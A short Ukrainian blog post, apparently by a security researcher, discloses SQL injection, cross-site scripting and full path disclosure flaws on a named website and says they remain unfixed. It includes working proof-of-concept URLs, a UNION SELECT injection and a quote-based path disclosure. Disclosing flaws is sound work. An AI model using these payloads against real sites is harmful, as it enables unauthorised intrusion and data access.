Уразливості на www.contenta-jansoft.com
19:26 10.09.200908.06.2009
У вересні, 18.09.2008, а також додатково сьогодні, я знайшов SQL Injection, Cross-Site Scripting та Full path disclosure уразливості на сайті http://www.contenta-jansoft.com. Про що найближчим часом сповіщу адміністрацію сайта.
Детальна інформація про уразливості з’явиться пізніше.
10.09.2009
SQL Injection:
http://www.contenta-jansoft.com/html/xmlout.php?file='%20union%20select%20version(),1%23
XSS (через SQL Injection):
Full path disclosure:
http://www.contenta-jansoft.com/html/xmlout.php?file=’
Дані уразливості досі не виправлені.